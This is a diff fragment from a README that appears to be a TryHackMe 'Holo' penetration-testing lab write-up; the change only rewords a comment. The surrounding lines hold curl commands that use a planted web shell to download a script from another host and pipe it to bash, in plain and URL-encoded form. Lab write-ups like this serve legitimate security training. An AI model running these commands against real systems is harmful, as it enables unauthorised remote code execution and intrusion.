austin-lai/External-Penetration-Testing-Holo-Corporate-Network-TryHackMe-Holo-Network/README.md

 curl 'http://192.168.100.1:8080/shell.php?cmd=curl http://10.50.103.20:80/rev.sh|bash &'

-# Then this is the payload with URL Encode to eliminate the issue of URl with space
+# This is the payload with URL Encode to eliminate the issue of URl with space
 curl 'http://192.168.100.1:8080/shell.php?cmd=curl%20http%3A%2F%2F10.50.103.20%3A80%2Frev.sh%7Cbash%20%26'
 ```